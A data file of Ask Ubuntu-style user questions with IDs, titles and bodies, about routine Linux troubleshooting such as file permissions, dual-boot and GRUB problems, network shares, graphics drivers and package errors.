393560	having trouble with chmod	before i would write `` sudo chmod 777 '' and then the name of the file or folder but now it does n't seem to change any permissions . i looked at multiple tutorials on how to use chmod and ca n't figure anything out . i need to change permissions of a folder with a lot of files . how can i change the permissions of all the files in one go ? i need to change the permissions from root to my user account . running nautilus in gksudo only allows me to change the permissions 1 file by one which will take way to long to do . when i select multiple files at once and go to the permissions tab in the properties it just says that the owner is root and i can not change it .
393561	how to install windows 7 after ubuntu on gpt disk	hi i am trying to install windows 7 on my laptop do a bit of work using a tool only available on windows.. but keep getting the error message : '' windows can not be installed to this disk . the selected disk is not of the gpt partition style '' i have ubuntu currently installed but nothing else and have created space for the windows installation using gparted . i do n't have a disk drive so have created a bootable usb with windows 7 on it . i have tried zeroing the free partition space and converting it to ntfs but they both didnt work . has anybody got a solution to the problem ? kind regards .
393563	how to change permissions on mounted windows share ?	i have mounted a windows share , but only root have write permissions.. i need to change that to my user ( einar ) so my programs can download and shave stuff to my windows share . commands i 've have used to mount : sudo mkdir /mnt/ussenterprise sudo gedit /etc/fstab //servername/sharename /mnt/ussenterprise cifs username=msusername , password=mspassword , iocharset=utf8 , sec=ntlm 0 0 sudo mount -a yes i have read access to everything in the mounted share , but only root gave write.. i 've tried : sudo chown einar : einar /mnt/ussenterprise , and sudo chown einar /mnt/ussenterprise i get ; permissions denied what to do ? solution : changed my fstab to : //server/share /media/share cifs username=msusername , password=mspassword , uid=1000 , gid=1000 0 0
393567	unable to choose ubuntu 13.10 during startup	i recently installed ubuntu 13.10 alongside an existing installation of windows 7 . problem is , i am unable to choose between operating systems and windows loads up by default ! how can i fix this from within windows since i can not access ubuntu ? i know this involves fixing the grub but i am unaware how to do so .
393569	making unity dash filters stick	first time poster . i have deselected nearly all categories and sources in unity search filter but every time i type something new they are automatically re-enabled ( music/amazon/ebay/lots more ) i would like my filtering to be permanent ( at least until the computer is shut down ) as i do not require any of these results i have searched my problem and not found an answer . i apologise if its already been covered .
393574	logging of commands executed in bash	sometime back , we had a requirement to log commands run on the terminal in the bash shell . this was solved by means of a startup script with essentially the following contents : # ! /bin/bash session_last_command= log_last_command ( ) { local command command= $ ( history 1 | sed -e `` s/^ [ ] * [ 0-9 ] * [ ] *// '' ) if [ [ -n `` $ session_last_command '' ] ] ; then logger -p local3.notice `` shell user [ $ $ ] : executed command : $ command '' fi session_last_command= '' $ command '' } export prompt_command=log_last_command it works fine except that pressing enter logs the last command again . this happens as many times as the enter key is pressed . and some users do have this habit ! is there a way to avoid these extra logs ? also , an obvious expectation from the solution will that a distinction between just pressing enter a few times and actually re-running the command be possible .
393576	finding unique gid 's	i have a piece of a script that will list all gids within /etc/group and /etc/passwd but i 'm looking for the final piece that ensures whatever is in the passed file , is also in group file . so , i 'm trying to comply with all gids referenced in /etc/passwd must be defined in /etc/group . here 's what i have : cat `` /etc/passwd '' `` /etc/group '' | sort | uniq -c i would like to have the results display the gids that are listed in one but not the other and if they are present in both , a 0 being displayed which , would just tell me no errors . how to resolve this ?
393578	bumblee settings	i have installed bumblebee on my lenovo w530 with ubuntu 13.10 . i have followed the guide given in https : //wiki.ubuntu.com/bumblebee and ensured that all settings are as in the wiki . when i run optirun i get the error : '' [ error ] can not access secondary gpu - error : [ xorg ] ( ee ) nvidia ( gpu-0 ) : failed to initialize the nvidia gpu at pci:1:0:0 . '' however the graphics card k2000m is the pci bus : '' 01:00.0 vga compatible controller : nvidia corporation gk107glm [ quadro k2000m ] ( rev ff ) '' and the pci setting is written into the xorg.conf.nvidia as `` busid `` pci:01:00:0 '' '' i have the packages nvidia-settings-319 , nvidia-settings , nvidia-319 and nvida-331 installed and synaptic reports that they are version 331.20-0ubuntu~x . any help in getting optirun working correctly is appreciated .
393582	wireless networking stops abruptly and works again for sometime after restart ?	i have been working on ubuntu ( 12.04 ) for ages now but all of a sudden i have been facing this problem for two weeks now . i start my laptop , ubuntu connects to a wireless network and i browse for a couple of minutes on chrome and all of a sudden the network stops responding - it shows `` resolving host '' or `` connecting ... '' and nothing comes up . i can not even ping any other machine or do an `` nslookup '' - everything fails . the wireless is still connected to ap but everything stops responding . i have to put the system to sleep and open it again to browse for another couple of minutes and then this happens again . any help on this is appreciated ! it has been a great pain for weeks now .
393585	compiz and intel g33/g31 flickering screen	i have installed ubuntu 10.04 on a pc celeron dual core 2.5 ghz , and 2 gb of ram . the integrated video is 82g33/g31 , and i have problems with flickering screen when playing videos with compiz enabled . use the drivers from ppa glasen-intel-driver and had never experienced these problems . the only solution i find is to disable compiz when i run a video . what is the problem ? i tested the drivers of the x-swat ppa and xorg-edgers , but without results . any help is welcome . thanks ! edit : i do not know why , but the screen flick even if i disable compiz . any suggest ? edit 2 : i found that flicker problems occur with versions of xserver-xorg-video-intel > 2.2.9.1 . the other versions i tried ( 2.2.14 and 2.2.15 ) , generated these problems . any ideas ?
393586	where is iscan-data_1.22.0-1_all.deb ?	i 'm trying to set up the scanner driver for my epson wf-3520 printer . i started with sudo dpkg -i iscan-network-nt_1.1.1-1_amd64.deb after downloading that `.deb ' file from the epson website . unfortunately , this fails with an error : unpacking iscan-network-nt ( from iscan-network-nt_1.1.1-1_amd64.deb ) ... dpkg : dependency problems prevent configuration of iscan-network-nt : iscan-network-nt depends on iscan ( > = 2.29.3 ) ; however : package iscan is not installed . dpkg : error processing iscan-network-nt ( -- install ) : dependency problems - leaving unconfigured errors were encountered while processing : iscan-network-nt based on previous discussions here and here , i need to start by installing `iscan-data_1.22.0-1_all.deb ' , but i ca n't find this . does it exist ? update : even after finding and installing iscan-data_1.22.0-1_all.deb , i get exactly the same error as listed above when i run sudo dpkg -i iscan-network-nt_1.1.1-1_amd64.deb . this is turning into a different kind of question ... follow the progress here !
393587	a part of a context menu can not be closed	my computer is working slow at the moment , and after a right click on some area for opening a menu this rectange was shown but the menu was n't loaded . i left-clicked out this rectangle but it had n't been hidden ! it is everywhere , i ca n't move it using alt key . it is transparent , but mouse events are not sent through this devil 's rect . i 've had this problem twice - logout can fix , but i do n't want to do it . what is it ? how to remove it ? thanks . ubuntu 12.10 . screenshot
393588	rsyslog ommail conf file causing zombie process	i have been trying to set up email alerts on a 12.04 server , but keep running into the same issue whenever i place my email-alert conf file in /etc/rsyslog.d . i 've named it 30-email-alerts.conf . upon restarting the service/server , rsyslogd stops working and ubuntu reports a zombie process . i 've tried this fix , but it dose n't seem to have changed anything . any suggestions ?
393590	why does my ubuntu 13.04 vps say it has a 2.6.x-series kernel ?	i have ordered a vps with ubuntu 13.04 on it . the vps reports that the kernel is a 2.6.x-series kernel . from what i have read , ubuntu 13.04 has at least the 3.8.x series of kernels . is there a reason that my vps is seeing a 2.6.x series kernel , and not a 3.8.x series kernel ?
393592	debugging php in ubuntu ( xdebug )	php vim debugger : configuring apache i am trying to install vdebug to debug php in vim . unfortunately , when i press f5 this message appears after a few seconds waiting for a connection ( ctrl-c to cancel , this message will self-destruct in 20 seconds ... ) no connection was made what should i do ? i searched about this in google , followed this tutorial and this one ( and many others ) but did not work . i followed vdebug instructions . i do not know how to achieve this : edit your apache configure file in your virtualhost section , set debugger port same as the one in your vimrc : php_value xdebug.remote_port **9009** the remote_port that has just been mentioned is different from what i have in xdebug.ini and vimrc . please , see below . right now i have in /etc/php5/apache2/conf.d/xdebug.ini : zend_extension=/usr/lib/php5/20121212/xdebug.so xdebug.remote_enable=1 xdebug.remote_handler=dbgp xdebug.remote_mode=req xdebug.remote_host=127.0.0.1 xdebug.remote_port=9000 xdebug.profiler_enable_trigger=1 xdebug.profiler_output_dir=/media/www/xdebugdata and in my vimrc let g : vdebug_options = { } let g : vdebug_options [ `` port '' ] = 9000 i installed xdebug helper chrome extension too . using an ide is not an option : i wish to use vim .
393596	youtube videos /flash player not working ! ! ubuntu 12.03	first of all i would like to mention i am new to non-windows os so please forgive if i am asking too basic/silly questions : here is my problem : i just installed ubuntu and when tried to play a video in youtube it asks for plugin , i have installed flash player plugin in mozilla still video are not playing as they have to . its displayed as ( pfa the image ) nazia @ nazia-pi865d7 : ~ $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 12.04.3 lts release : 12.04 codename : precise i have tried following ways to resolve it but nothing helped : disabled plugins in crome ran sudo vi /ect/adobe/mms.cfg and tried to edit it but it says no permission sudo apt-get install adobe-flashplugin and sudo apt-get install gecko-mediaplayer dpkg -l |egrep 'flash|gnash|swf|spark' result : nazia @ nazia-pi865d7 : ~ $ dpkg -l |egrep 'flash|gnash|swf|spark' ii adobe-flash-properties-gtk 11.2.202.332-0precise2 gtk+ control panel for adobe flash player plugin version 11 ii adobe-flashplugin 11.2.202.332-0precise2 adobe flash player plugin version 11 rc flashplugin-installer 11.2.202.332ubuntu0.12.04.1 adobe flash player plugin installer nazia @ nazia-pi865d7 : ~ $ how to fix this ? ps : sorry , unable to attach image as it says i need 10 reputations to post images .
393598	restoring backup	i used rsync to back up my data from vbox . i replaced the fstab of the backup with the fstab of a fresh install . i then used that data to restore everything on the same fresh install . now i 'm unable to update my grub as no commands work . i have permission denied on every command . is there a way to get back those permissions . and if not is there any way by which i can use all the applications and settings of my vbox install on the fresh install . i have access to that vbox install . also i have a complete rsync backup of that install on an external drive .
393600	unable to do security updates on ubuntu 12.04	it 's that the update would have me installing things from an unsecured source . when i go to the update manager and only select the security updates instead of the recommended updates as well i still get the same result . when i hit more info when the error pops up it says '' accountsservice apt apt-transport-https apt-utils curl fonts-opensymbol gnome-control-center gnome-control-center-data gnome-desktop3-data gnupg gpgv landscape-client-ui-install libaccountsservice0 libapt-inst1.4 libapt-pkg4.12 libcurl3 libcurl3-gnutls libcurl3-nss libdjvulibre-text libdjvulibre21 libgnome-control-center1 libgnome-desktop-3-2 libjpeg-turbo8 libopenjpeg2 libqt4-dbus libqt4-declarative libqt4-network libqt4-opengl libqt4-script libqt4-sql libqt4-sql-sqlite libqt4-svg libqt4-xml libqt4-xmlpatterns libqtcore4 libqtgui4 libreoffice-base-core libreoffice-calc libreoffice-common libreoffice-core libreoffice-draw libreoffice-emailmerge libreoffice-gnome libreoffice-gtk libreoffice-help-en-us libreoffice-impress libreoffice-math libreoffice-style-human libreoffice-style-tango libreoffice-writer linux-firmware pm-utils python-uno qdbus rsyslog software-center uno-libs3 ure '' any ideas on whats going on and what i can do for it ? i do n't like not updating my security .
393601	a command for pasting ; the same as ctrl + v	is there a command for pasting what is in clipboard . i need a command that does the same thing as to press ctrl+v . i tried a few options for xclip but they do n't paste normally and need middle click or so .
393603	where do i get the update-java-alternatives command . what package does it come from ?	where do i get the 'update-java-alternatives ' command . what package does it come from ? my understanding is that you use 'update-alternatives ' to initially add a java instance to your system but once you have multiple instances added you can use the 'update-java-alternatives ' command to flip all the symlinks using a single command . can anyone provide insight on where i can get this command on any debian system or even a redhat system ?
393604	connect k8055n experiment board to ubuntu	i purchased a k8055n velleman experimental board and for some reason every program i run or if i try to access the board i get the following error : could not open the k8055 ( port:0 ) please ensure that the device is correctly connected . i do however suspect my rules are not correct but i did save velleman rules file in /etc/udev/rules.d but after reboot the os freezes . i can not work out what is wrong with my velleman rules . i also tried to install the gui but could not make the file . ~/k8055 $ cd k8055gui ~/k8055/k8055gui $ cd src ~/k8055/k8055gui/src $ make g++ wx-config -- cxxflags -c myapp.cpp -o myapp.o /bin/sh : 1 : wx-config : not found in file included from myapp.cpp:1:0 : myapp.h:4:19 : fatal error : wx/wx.h : no such file or directory compilation terminated . make : *** [ myapp.o ] error 1
393605	files access/modified in a process/script	i will be getting some shell scripts that i , kind of , dont know what they will be doing . but i need to know what i/o operations the script performs ( e.g . files they read/access , files they write , folders created ... etc ) . an example is using strace as follows : input script : g++ -wall a.cpp -o hello i will run it as : sudo strace -f -e trace=open g++ -wall a.cpp -o hello 2 > output.txt *what i want : * output.txt will have the trace and which files had been accessed ( a.cpp and b.h which is used in a.cpp , and output hello ) ... [ pid 13871 ] open ( `` a.cpp '' , o_rdonly|o_noctty|o_largefile ) = 3 [ pid 13871 ] open ( `` b.h '' , o_rdonly|o_noctty|o_largefile ) = 4 ... [ pid 13874 ] open ( `` hello '' , o_rdwr|o_creat|o_trunc|o_largefile , 0666 ) = 3 ... problem 1- strace doesnt handle pipe so if i get a command like mkdir d2 | cp *.c d2/ it will only detect the first command mkdir d2 . 2- strace provide too much info which is fine but if something is more concrete that would be great ! i searched for other tools and utils , and most of them would list info for a running process and i dont want that since the script will be executed immediately and nothing would be in the process list in ubuntu . any ideas on how can i achieve this in ubuntu ?
393607	printer scanner driver for epson workforce wf-5320	having trouble with setup here . i have 64-bit ubuntu unity 12.10 . first i ran sudo apt-get install xsltproc then i clicked accept on the epson website here . i downloaded iscan-data_1.25.0-1_all.deb and installed it with sudo dpkg -i iscan-data_1.25.0-1_all.deb next , after some trial and error ( because there were several .deb files to choose from , but only one would install successfully ) , i downloaded iscan_2.29.3-1~usb0.1.ltdl7_amd64.deb and ran sudo dpkg -i iscan_2.29.3-1~usb0.1.ltdl7_amd64.deb next , as suggested here , i ran sudo gedit /etc/sane.d/epkowa.conf and inserted a line below in the examples section : net xxx , where for xxx i inserted my best guess at the ip address of the printer . finally , from my dash home , i typed `` epson '' , and a new application `image scan for linux ! '' appeared . however , when i try to launch this , i only get a message that says `` could not send command to scanner . check the scanner 's status '' . now what ? the scanner just worked fine a moment ago through it 's connection with a windows machine . i wonder if i have the wrong ip address for my printer . including this , i have not yet found an explanation of how to identify the ip address of my printer in a fully straightforward way .
393608	setting up nfs server	i am a new student of linux . i am having a challenge as ragards setting up an nfs server . i have one desktop running ubuntu 13.4 and i need to set up an nfs server and then mount and share files between the server and client . can i use one system for this task that is , set up both client and server on this machine or do i have to use two systems ? one for server and the other for client . if the nfs server and client can be set on one system please how do i go about it ? i will be grateful for your reply .
393609	need help in understanding the contents of registers as displayed by the info registers in gdb	i am using infinite recursion to generate core and to understand debugging it with gdb . void foo ( ) { return foo ( ) ; } int main ( ) { foo ( ) ; return 0 ; } can you explain me the `` info register '' of gdb output in ubuntu ? what each register represent and what are the significance of the contents ? can you predict the bug only with the help of these registers ? .
393610	how to unlock selected files from root ?	i am trying to unlock files from my root to a admin account . i 've tried by going into the account and moving the files into it , but when i go to the account its all locked . and when i do ctrl+a and it selects all of the files . and then i right click on one file because all of then are selected , then i change the permissions to my admin account . the folders are unlocked but the folders inside them are n't . is there a way to unlock them all ?
393613	installing ubuntu server to virtual box	i would like to install ubuntu server 10.04-2.7z which i downloaded from sourceforge , as i was downloading , i googled for an iso image of the os so even though there was no .iso , i assumed it was an image , however , when i am installing the image on virtual box , the first discrepency i notice is that when i click on storage , on controller : ide , i see host drive : e instead of empty which is on all the tutorials i have followed . and then when i click on add virtual cd/dvd disk file , the file that i have extracted to my desktop doesnt do anything when i click on it . this is the data about the os i installed ubuntu linux server edition 10.04.2 lts x86 size ( compressed/uncompressed ) : 295.04 mb/1.3 gb link : http : //sourceforge.net/projects/virtualboximage/files/ubuntuserver/10.04.2/ubuntu_server_10-04-2.7z/download active user account ( s ) ( username/password ) : ubuntu/reverse notes : guest additions not installed ; meta-package build-essential installed . i am using oracle virtual box 4.3.6-9140.win-exe . i am sorry the questionmay not be quite clear without screenshots , but any help will be truly appreciated
393617	erratic mouse behavior . wo n't click inside new windows . must unplug and replug the mouse . dual boot windows 8 . new install	i just installed ubuntu 13.10 as a dual boot along side my windows 8 partition . i can move the cursor around the screen , but the ability to click is erratic . upon boot , i am able to click on an application in the toolbar , but as soon as any new window opens , my clicks are no longer read . furthermore , when i drag the cursor over a text box , when it should change to the typing cursor , it stays as an arrow . i think the cursor is still focused on the background ? i do n't know . to get it working again , i must unplug and replug the mouse . once i 've done that , it will work again until a new window is opened . i 'm using a plain , usb mouse .
393618	ubuntu 12.04.03 64-bit install fails from liveusb	so as per my title i am trying to install the 64 bit version on my pc .the processor is intel core 2 duo t5250 .on trying to boot from the usb the screen displays `` boot error '' once it didisplayed something about kernel error or something ( i did n't quite get it ) . but i 've ran windows 7 64 bit on the same pc so it should n't have been a problem . currently i have 32 bit ubuntu on the system .is it interfering ? i really need to run the 64 bit ( specific apps ) p.s . the cpu architecture is i686 but the op mode is both 32 and 64 bit
393619	my upgrade stopped	i was upgrading my ubuntu from 13.04 to 13.10 , i got all the updates , but my internet connection stopped while my system was installing the upgrades . as the connection started again , the installation did n't start again as well .
393624	how to install zentyal on remote ubuntu server ?	i`m noob in linux , so be patient ) ) ) ) . how to install it on vps ( ubuntu 13.04 , openvz ) ? do i have to download image firstly to server and run it or should i install it from ubuntu repository ? i have only ssh connection to server . and how to connect to zentyal after installation ? i know that have to set up vpn .
393629	xrdp kde issue . ca n't run remote from sudo	i need some help . i have my home pc with kubuntu 13.10 and xrdp server on it for remote usage . the problem is when i login in through rdp and trying to run any aplication from root ( using sudo in konsole ) program starts it window but i get only grey background instead of program . check the screenshot here is some debug message from konsole avkutyrev @ system164 : ~ $ x error : badaccess ( attempt to access private resource denied ) 10 extension : 130 ( mit-shm ) minor opcode : 1 ( x_shmattach ) resource id : 0x119 x error : badshmseg ( invalid shared segment parameter ) 128 extension : 130 ( mit-shm ) minor opcode : 5 ( x_shmcreatepixmap ) resource id : 0xe0 x error : baddrawable ( invalid pixmap or window parameter ) 9 major opcode : 62 ( x_copyarea ) resource id : 0x4200026 x error : baddrawable ( invalid pixmap or window parameter ) 9 major opcode : 62 ( x_copyarea ) resource id : 0x4200026 x error : baddrawable ( invalid pixmap or window parameter ) 9 major opcode : 62 ( x_copyarea ) resource id : 0x4200026 x error : baddrawable ( invalid pixmap or window parameter ) 9 major opcode : 62 ( x_copyarea ) resource id : 0x4200026 x error : baddrawable ( invalid pixmap or window parameter ) 9 major opcode : 62 ( x_copyarea ) resource id : 0x4200026 i get the same issue with x11rdp-session and with vnc-session in xrdp . if i do the same steps localy on pc every thing goes well . the only program that i can run from the root is term . someone tells me this is kde issue . can somebody help me ? kubuntu 13.10 xrdp 0.6.0
393630	script for moving the most frequently used tabs in unity launcher ?	i find myself moving the last used icon in the unity launcher to the top for easier access to the programs that i 'm using . i use different programs on a daily basis depending on what i 'm trying to accomplish . is there a script that i can use to do this automatically ?
393635	gnome3 runs faster when running game	i 'm having a bizarre , and kind of funny , `` problem '' ( if you can call it such ) . ordinarily , gnome shell is quite choppy on my system . sure , it 's smooth `` enough '' and fast `` enough '' but it most certainly is n't much of a joy to use , especially when compared to eos 's pantheon , though it still beats unity performance wise . i noticed the other day that while running a 3d game in fullscreen , gnome shells 's performance improves dramatically . not only is the interface twice as smooth , but applications load faster as well . there 's still a bit of stutter here and there , but the difference is like night and day . my question is this : is there any way to reach this performance level without having to run a game in the background at all times ? my pc has a haswell i5 with hd4600 graphics , my os is ubuntu gnome 13.10 running gnome 3.10 , and i have the latest mesa drivers , if that 's any help . any suggestions would be much appreciated . thanks in advance !
393638	unicodedecodeerror : 'ascii ' codec ca n't decode byte 0x* in position * : ordinal not in range ( 128 )	i tried to enter the following command add-apt-repository ppa : ondrej/php5 you are about to add the following ppa to your system : this branch follows latest php packages as maintained by me & rest of the debian pkg-php team . you can get more information about the packages at https : //sury.org if you need to stay with php 5.4 you can use the oldstable php repository : â â â â ppa : ondrej/php5-oldstable ... gpg : keyring `/tmp/tmpy7ajyf/secring.gpg ' created gpg : keyring `/tmp/tmpy7ajyf/pubring.gpg ' created gpg : requesting key e5267a6c from hkp server keyserver.ubuntu.com gpg : /tmp/tmpy7ajyf/trustdb.gpg : trustdb created gpg : key e5267a6c : public key `` launchpad ppa for ond\xc5\x99ej surý '' imported gpg : total number processed : 1 gpg : imported : 1 ( rsa : 1 ) exception in thread thread-1 : traceback ( most recent call last ) : file `` /usr/lib/python3.3/threading.py '' , line 639 , in _bootstrap_inner self.run ( ) file `` /usr/lib/python3/dist-packages/softwareproperties/ppa.py '' , line 141 , in run self.add_ppa_signing_key ( self.ppa_path ) file `` /usr/lib/python3/dist-packages/softwareproperties/ppa.py '' , line 238 , in add_ppa_signing_key tmp_export_keyring , signing_key_fingerprint , tmp_keyring_dir ) : file `` /usr/lib/python3/dist-packages/softwareproperties/ppa.py '' , line 190 , in _verify_fingerprint got_fingerprints = self._get_fingerprints ( keyring , keyring_dir ) file `` /usr/lib/python3/dist-packages/softwareproperties/ppa.py '' , line 182 , in _get_fingerprints output = subprocess.check_output ( cmd , universal_newlines=true ) file `` /usr/lib/python3.3/subprocess.py '' , line 575 , in check_output output , unused_err = process.communicate ( timeout=timeout ) file `` /usr/lib/python3.3/subprocess.py '' , line 909 , in communicate stdout = _eintr_retry_call ( self.stdout.read ) file `` /usr/lib/python3.3/subprocess.py '' , line 476 , in _eintr_retry_call return func ( *args ) file `` /usr/lib/python3.3/encodings/ascii.py '' , line 26 , in decode return codecs.ascii_decode ( input , self.errors ) [ 0 ] unicodedecodeerror : 'ascii ' codec ca n't decode byte 0xc5 in position 92 : ordinal not in range ( 128 ) i am trying to install php5.5 . is there a work around for this bug ? or how to fix this ? the contents of locale ad locale -a locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory lang=en.utf-8 language= lc_ctype= '' en.utf-8 '' lc_numeric= '' en.utf-8 '' lc_time= '' en.utf-8 '' lc_collate= '' en.utf-8 '' lc_monetary= '' en.utf-8 '' lc_messages= '' en.utf-8 '' lc_paper= '' en.utf-8 '' lc_name= '' en.utf-8 '' lc_address= '' en.utf-8 '' lc_telephone= '' en.utf-8 '' lc_measurement= '' en.utf-8 '' lc_identification= '' en.utf-8 '' lc_all= locale -a locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_collate to default locale : no such file or directory c c.utf-8 posix locale -a locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_collate to default locale : no such file or directory c c.utf-8 posix
393639	hp paviliion g6 with wifi button always disabled	i have an hp pavilion g6 2307-sp , with ubuntu 13.10 , and i 've got the `` f12 can not enable wireless networks '' problem . i 've been looking around here , but so far , nothing has worked for me , yet . can anyone give me a help ? thanks in advance . luis
393640	a command for kde short date format	by the command $ date the time and date of the system ( according to local place ) is printed . is there a command that outputs kde 's short date format in terminal ? the date in kde also depends on a calender :
393641	ubiquitous encrypted communication	what existing ubuntu applications exist to send encrypted communications using common technologies like email , chat and voip ?
393642	realtek 8723 ae not working after graphics driver update ( from fresh install of ubuntu 12.04.3 )	so i 'm trying to install ubuntu 12.04.3 on an msi ge70 with nvidia geforce 765m . here 's the deal : i install ubuntu off live-usb , with third party option enabled and automatic updates . when i reboot , blank screen . i manage to set up a connection from the console ( ctrl+alt+f1 ) , then run the usual : apt-get update nvidia purge/reinstall install bumblebee apt-get upgrade then , on second reboot , i ca n't get the wireless to work . says no device connected . i 'm pretty sure the apt-get upgrade is the issue here ( i do n't see why it would be anything else ) . is there a way i can `` protect '' the wireless drivers when running package commands ? the one that ships with the basic 12.04.3 works fine . extra details : the wired connection useless , too . wireless : realtek 8723 ae . i am reinstalling ubuntu as i write this to be able to work from plain . i 'll update if i run into problems . i 'll try to install nvidia drivers without running apt-get upgrade , to see if i can maintain wireless capabilities and drivers . still , even if that method works , i 'd like to know why i ca n't upgrade my os . any ideas ? update : i installed the graphic drivers without doing an apt-get upgrade , and hell did n't break loose , wireless still works ! the integrated graphics work fine , but i 'm still having issues with the discrete gpu . at least , i can do that from the install itself instead of a chrooted session from the livecd . update 2 : since i could n't get bumblebee to work , i bit the bullet and did a apt-get upgrade . i then did service network-manager restart , wireless did n't break . i then did a reboot , and nope , no more wireless . so , something that got updated broke my driver . lsmod | grep rtl spits out : rtl8723ae 89950 rtlwifi 81225 1 rtl8723 and some other stuff .
393646	is there a shortcut key to split view the file manager on xubuntu 12.04 ?	i am wandering to know if an hot key exists to split view the xubuntu file manager . it is possible to do it on ubuntu with f3 , and it looks like :
393647	how to install mdk3 in ubuntu 13.04	hi there i am currently new to ubuntu and i have found out that someone else is using my wireless network i have seen a lot of videos in you-tube about how to kick off such nodes from a network but all of them involve using mdk-v6 , i have downloaded the file from various sites and i have not been successful in installing it . can someone please help me ! ! ?
393651	is there script to migrate from mac	i am thinking to migrate from os~x to ubutun . i am making a list of alternate software i need ... all is ok . but ... is there any script which migrate all my own data from my mac home folder to ubuntu folder , included data linked to the system like password or newtwork configuration ...
393653	using ssh with wallet on kde	how can i use wallet with ssh keys ? i found many different descriptions , i 've got ssh-agent running , i 've added a script at autostart/ssh-add.sh : # ! /bin/bash export ssh_askpass=/usr/bin/ksshaskpass /usr/bin/ssh-add ~/.ssh/id_rsa.2 /usr/bin/ssh-add ~/.ssh/id_rsa.3 when kde started for the first time after adding that , i was asked for a password to unlock wallet , and for the password for unlocking the files . i 've checked , the passwords are stored in wallet . however when i run ssh from command line , then i 'm still asked for the password for ssh account . any ideas what i could check or change ?
393654	why ubuntu does n't upgrade to the latest version of gnupg ?	two days ago gnupg announced the release of a new stable version . the new version is 1.4.16 but the repository of ubuntu saucy have 1.4.14 . i do n't understand this because the new release cover a critical bug and , as you can see in the next picture , canonical provides critical updates . after sudo apt-get upgrade & & sudo apt-get upgrade it says there is nothing to update . why ?
393658	how does one make a usb boot drive from windows ? ( not an installation usb )	i am working on windows 7 . so i followed the instructions that the ubuntu site has helpfully directed me to in order to burn an .iso to my usb drive . i booted from it and everything , but upon boot it failed to load the drivers for my keyboard and trackpad ( using a laptop. ) . having literally no other option i held down the power button to shut it down since , obviously , i could n't tell it to shut down . i tried to power it up again since the lack of keyboard happened to me once with the startup cd ( made it before i realized my laptop could n't make a big enough partition to accommodate ubuntu ) . but it spits out something about killing init ! and panic occurring . it says it is switching to text console but it never does . basically , i 'm asking how to skip the live part in live usb and just install it ?
393660	exclude package installation to resolve conflict	when i try to install a package by doing apt-get install abc* it gives me an error between two packages that abc-x : | conflicts : abc-y e : unable to correct problems , you have held broken packages . i would like to exclude abc-x from the regex of my initial command . is there a way i can accomplish this ?
393664	is it possible to add an svn repo as apt-get update ?	the title already says most of it . i wanted to know if it 's possible to handle svn update commands over apt-get upgrade . basically , every time when a specific svn repo is outdated , i should get the update notification , like with any other package . is a configuration like that at all possible ?
393667	screen flashes back and forth between black and lit screen , not at boot , totally random	currently using hp/compaq 6220 laptop with 12.04 lts installed . sometimes after the system warms up and is running , it will randomly flash the screen to black , back to the screen , back to black , and again to the lit screen . the images on the screen are not distorted when it 's visible , and this may happen over and over again . i 've tried switching from one laptop to another of exactly the same model , i have multiple ones sitting around . this is definitely not a hardware issue , i have to use 12.04 for the wireless drivers to work , 12.10 does n't have wireless drivers compatible with this unit . most of the time it happens when i 'm trying to watch a video file , either online or on the system . does n't happen at boot at all that i can notice . also happens when surfing the net , this is completely annoying and i ca n't find any solutions , anyone have any ideas ? this did n't start until about a week or 10 days ago , up until then the system was perfect .
393669	cinnamon freezing on first click	cinnamon boots fine , but freezes the second you click the menu or panel . any ideas ? ubuntu 13.10 , fresh install hp elitebook 6930p amd radeon 3500/2700
393670	issue with ubuntu 13 keyboard 's functioning on spacebar/ enter/ backspace	having ubuntu 13.10 installed on 64 bit machine i am encountering with some issue with keyboard 's spacebar/ enter/ backspace keys . when i click on spacebar , first for several times , it doesnât functions at all and sometimes generates these chars 'zcvx ' or 'zcvx , ' the enter and backspace either function wrong . can you please let me know why and how to fix it ?
393671	wordpress alias problem	i have configuration like this : alias /blog /usr/share/wordpress alias /blog/wp-content /var/lib/wordpress/wp-content < directory /usr/share/wordpress > options followsymlinks allowoverride limit options fileinfo directoryindex index.php order allow , deny allow from all < /directory > < directory /var/lib/wordpress/wp-content > options followsymlinks order allow , deny allow from all < /directory > in general i follow up this procedure help.ubuntu.com . problem is in fact when i restart apache2 i get message '' the alias directive in /etc/apache2/sites-enabled/wordpress at line 2 will probably never match because it overlaps an earlier alias . '' i had been added on test.php file on /var/lib/wordpress/wp-content . if i try mydomain.com/blog/wp-content/test.php , i got error 404 . this means that in general i miss all plugins/themes static files . what could be a fix for it ?
393672	/var move problem , low graphic mode	i have different partition for /opt and i tried to move my /var into /opt/var . what i did , log in using live usb . open a nautilus using sudo nautilus copy the contents of /var ( from actual root partition ) into /opt/var ( actual opt partition ) and delete /var . all the things i do using nautilus open with sudo . i also add the following line into fstab . /opt/var /var none bind now when i reboot and log in , it is showing low graphics window . so i go to recovery mode and apply fsck to load fstab . then i use root terminal and ls in /var and it 's working . total 48 drwxr-xr-x 2 root root 4096 oct 29 18:53 backups drwxr-xr-x 22 root root 4096 dec 13 10:43 cache drwxrwsrwt 2 root root 4096 oct 30 05:18 crash drwxr-xr-x 79 root root 4096 dec 14 20:43 lib drwxrwsr-x 2 root root 4096 oct 13 20:41 local lrwxrwxrwx 1 root root 9 dec 20 21:29 lock - > /run/lock drwxr-xr-x 14 root root 4096 oct 29 18:21 log drwxrwsr-x 2 root root 4096 oct 16 18:58 mail drwxrwsrwt 2 root root 4096 oct 16 19:03 metrics drwxr-xr-x 2 root root 4096 oct 16 18:58 opt lrwxrwxrwx 1 root root 4 dec 20 21:29 run - > /run drwxr-xr-x 9 root root 4096 oct 16 19:01 spool drwxrwxrwt 3 root root 4096 dec 20 21:21 tmp drwxr-xr-x 2 root root 4096 dec 1 11:07 www what am i missing ? i also heard about chroot . but i am not sure about this and did n't apply . i am posting this from livecd . thanks.. edit i tried lot to recover by changing the permission/ownership from another filesystem ( same type ) . finally i have reinstalled my system with format the partition . i found some issues ( no wifi device , no cursor ) after installing the system without format the partition .
393682	programs are not opening when clicking on files with ubuntu	when i download any file type and open it in `` files '' nautilus and i click on the file , again any type , it does not open the program associated with the file . i have to right click and select open program . anyone got a fix ?
